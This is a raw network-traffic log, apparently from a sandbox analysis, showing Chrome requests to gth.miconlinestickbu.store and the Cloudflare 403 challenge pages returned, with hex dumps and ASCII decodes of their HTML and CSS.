2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69
                                    Data Ascii: min-height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring di
                                    2024-05-22 15:09:27 UTC1369INData Raw: 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f
                                    Data Ascii: C41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{co
                                    2024-05-22 15:09:27 UTC1369INData Raw: 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c
                                    Data Ascii: xNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-col
                                    2024-05-22 15:09:27 UTC1369INData Raw: 42 4d 54 4d 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a
                                    Data Ascii: BMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLj
                                    2024-05-22 15:09:27 UTC1369INData Raw: 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73
                                    Data Ascii: border-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";dis
                                    2024-05-22 15:09:27 UTC1369INData Raw: 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d
                                    Data Ascii: dia screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}
                                    2024-05-22 15:09:27 UTC1369INData Raw: 63 67 2e 6a 33 68 2e 71 70 36 4c 33 6c 67 45 62 79 6a 30 66 61 76 58 57 4a 66 6b 78 67 36 59 79 34 46 73 65 43 48 33 67 30 6d 61 52 53 36 47 54 6c 51 47 36 71 59 78 77 4b 39 68 30 47 74 35 54 5f 51 42 4e 30 77 31 6e 4c 55 38 50 4d 72 49 63 75 72 39 6a 50 6a 34 41 71 76 70 4d 50 56 79 35 38 6e 7a 66 37 4e 4b 41 30 65 31 56 58 46 46 50 35 2e 45 31 64 37 63 5a 41 75 34 34 61 34 42 35 54 51 74 61 4a 32 36 2e 62 37 64 34 53 32 4d 54 44 41 62 70 33 56 33 53 78 4f 68 63 51 50 37 57 5a 49 6d 4c 46 76 61 77 4d 6a 63 58 6c 4f 6d 42 2e 6f 64 43 61 6e 59 43 39 34 31 5f 6a 74 44 4a 32 52 48 43 42 56 74 31 47 38 38 56 76 70 79 6a 49 6d 75 58 72 73 61 31 39 61 5a 75 66 42 34 62 5a 31 4d 6c 4d 5f 78 4e 64 7a 4d 61 43 6d 34 74 45 52 30 58 63 57 6e 32 46 42 48 44 66 55 6c
                                    Data Ascii: cg.j3h.qp6L3lgEbyj0favXWJfkxg6Yy4FseCH3g0maRS6GTlQG6qYxwK9h0Gt5T_QBN0w1nLU8PMrIcur9jPj4AqvpMPVy58nzf7NKA0e1VXFFP5.E1d7cZAu44a4B5TQtaJ26.b7d4S2MTDAbp3V3SxOhcQP7WZImLFvawMjcXlOmB.odCanYC941_jtDJ2RHCBVt1G88VvpyjImuXrsa19aZufB4bZ1MlM_xNdzMaCm4tER0XcWn2FBHDfUl


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.449814104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:27 UTC423OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:27 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16310
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:27 UTC765INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 39 31 4e 53 52 2b 49 56 30 36 69 50 38 6b 4d 6e 37 72 5a 35 4a 6e 4e 78 66 58 79 48 31 62 70 74 64 75 6e 6a 36 74 6b 68 47 54 55 62 73 59 39 63 4e 75 41 57 4c 70 6c 66 59 64 65 38 44 56 51 6e 79 52 45 4f 30 4c 78 42 44 51 6b 73 63 47 46 75 54 56 75 37 51 41 41 43 62 2b 76 33 36 2b 53 4e 36 45 39 4b 46 75 34 31 52 78 36 4c 79 66 62 52 78 4f 31 77 7a 61 76 36 37 41 38 35 64 5a 4c 76 41 65 4f 64 54 4c 77 4c 58 7a 6e 64 74 2f 6f 73 58 77 68 5a 2f 67 3d 3d 24 61 73 61 36 74 52 58 55 5a 55 55 45 72 56 63 77 6f 79 58 2b 51 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: 91NSR+IV06iP8kMn7rZ5JnNxfXyH1bptdunj6tkhGTUbsY9cNuAWLplfYde8DVQnyREO0LxBDQkscGFuTVu7QAACb+v36+SN6E9KFu41Rx6LyfbRxO1wzav67A85dZLvAeOdTLwLXzndt/osXwhZ/g==$asa6tRXUZUUErVcwoyX+Qg==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:27 UTC693INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:27 UTC1369INData Raw: 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61
                                    Data Ascii: a{color:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-ima
                                    2024-05-22 15:09:27 UTC1369INData Raw: 6e 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20
                                    Data Ascii: n;min-height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring
                                    2024-05-22 15:09:27 UTC1369INData Raw: 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b
                                    Data Ascii: wIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{
                                    2024-05-22 15:09:27 UTC1369INData Raw: 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                    Data Ascii: 0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-c
                                    2024-05-22 15:09:27 UTC1369INData Raw: 54 4e 42 4d 54 4d 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74
                                    Data Ascii: TNBMTMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYt
                                    2024-05-22 15:09:27 UTC1369INData Raw: 31 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64
                                    Data Ascii: 1;border-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";d
                                    2024-05-22 15:09:27 UTC1369INData Raw: 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70
                                    Data Ascii: media screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42p
                                    2024-05-22 15:09:27 UTC1369INData Raw: 33 78 33 6b 67 42 74 75 6b 78 66 54 65 33 61 4a 56 46 65 4d 65 39 72 66 71 4c 75 79 34 38 50 4b 59 31 53 42 69 70 77 30 34 43 4c 42 6b 79 63 71 69 56 57 30 72 31 78 50 2e 6c 2e 32 36 55 6d 5f 77 67 77 77 6a 45 32 33 52 48 6a 34 56 69 64 4c 38 31 6a 5a 59 41 5a 4d 52 31 48 5a 52 45 71 39 52 6f 47 6a 47 63 61 5f 6c 46 75 38 46 6b 72 2e 67 77 53 30 44 37 6e 4b 75 2e 75 52 5a 62 53 44 61 4f 6b 71 5f 4e 4d 72 79 66 49 75 65 48 75 39 37 34 79 6c 77 6e 6e 54 70 43 6d 5f 4f 48 56 61 37 77 59 71 62 48 78 30 73 4c 71 5a 44 6d 54 68 53 58 46 76 49 69 74 2e 51 50 34 4f 36 73 70 70 46 68 59 67 4d 67 75 77 38 79 4f 64 4a 34 7a 5a 47 72 69 59 52 67 44 6e 64 45 6f 6e 41 75 59 62 45 31 49 69 31 5f 49 61 5a 50 4d 51 72 67 53 2e 34 37 68 44 6d 41 69 59 37 37 53 57 39 77 67
                                    Data Ascii: 3x3kgBtukxfTe3aJVFeMe9rfqLuy48PKY1SBipw04CLBkycqiVW0r1xP.l.26Um_wgwwjE23RHj4VidL81jZYAZMR1HZREq9RoGjGca_lFu8Fkr.gwS0D7nKu.uRZbSDaOkq_NMryfIueHu974ylwnnTpCm_OHVa7wYqbHx0sLqZDmThSXFvIit.QP4O6sppFhYgMguw8yOdJ4zZGriYRgDndEonAuYbE1Ii1_IaZPMQrgS.47hDmAiY77SW9wg


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    46192.168.2.449815104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:28 UTC449OUTGET /x/617b5a702a34daddd03071650f95cbe6664e0aa557460 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:28 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16506
                                    Connection: close
